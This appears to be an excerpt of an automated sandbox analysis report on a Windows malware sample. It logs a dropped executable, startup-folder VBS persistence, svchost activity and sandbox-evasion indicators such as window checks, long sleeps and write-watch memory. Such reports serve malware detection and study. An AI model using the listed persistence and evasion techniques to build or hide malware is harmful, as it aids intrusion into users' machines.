Source: DSD876543456780000.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DSD876543456780000.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DSD876543456780000.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DSD876543456780000.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DSD876543456780000.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BF42DE
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C10A76 push ecx; ret 0_2_00C10A89
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00BF5C92 push 00000043h; ret 0_2_00BF5C94
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E80A76 push ecx; ret 2_2_00E80A89
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041C40C push cs; iretd 3_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00423149 push eax; ret 3_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041C50E push cs; iretd 3_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004231C8 push eax; ret 3_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040E21D push ecx; ret 3_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0041C6BE push ebx; ret 3_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_076BE558 push eax; iretd 3_2_076BE559
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_00423149 push eax; ret 6_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_004231C8 push eax; ret 6_2_00423179
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0040E21D push ecx; ret 6_2_0040E230
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 6_2_07ACE558 push eax; iretd 6_2_07ACE559
Drops PE files
Source: C:\Users\user\Desktop\DSD876543456780000.exe File created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Jump to dropped file

Boot Survival
barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C0F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00C0F98E
Source: C:\Users\user\Desktop\DSD876543456780000.exe Code function: 0_2_00C81C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C81C41
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00E7F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 2_2_00E7F98E
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Code function: 2_2_00EF1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 2_2_00EF1C41
Source: C:\Users\user\Desktop\DSD876543456780000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\DSD876543456780000.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found API chain indicative of sandbox detection
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\DSD876543456780000.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe API/Special instruction interceptor: Address: 35C3274
Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe API/Special instruction interceptor: Address: 13D3274
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 5190000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 5190000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 7190000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 55A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 55A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 75A0000 memory reserve | memory write watch Jump to behavior
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 3_2_004019F0
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599890 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599781 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599671 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599562 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599341 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599125 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598686 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598573 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598340 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598124 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597687 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597568 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597437 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597323 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597203 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597093 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596984 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596875 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596765 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596656 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596546 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596437 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596325 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596218 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596109 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595890 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595781 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595671 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595562 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595343 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595234 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595125 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595015 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594906 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594796 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594687 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594578 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599766 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599656 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599547 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599438 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599328 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599219 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 599109 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598998 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598724 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598484 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598375 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598263 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598156 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 598047 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597938 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597828 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597719 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597484 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597375 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597266 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597156 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596813 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596703 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596469 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596359 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596250 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596141 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 596031 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595922 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595812 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595702 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595594 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595469 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595359 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595250 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595141 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 595031 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594922 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594813 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594688 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594563 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594453 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread delayed: delay time: 594344 Jump to behavior
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 1746 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Window / User API: threadDelayed 8107 Jump to behavior
